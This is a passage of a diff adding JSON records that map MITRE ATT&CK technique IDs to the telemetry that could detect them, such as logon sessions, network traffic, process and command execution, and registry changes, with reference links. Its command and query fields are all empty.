This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in 
order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", 
+ "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1134.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" 
+ ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1213.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon 
sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], 
+ [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1213.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1555.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ 
+ "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1559.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format 
executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an 
execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1559", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was 
loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script 
content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1558", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, 
Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1557", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + 
"source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1556.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": 
"Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" 
+ }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by 
the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + 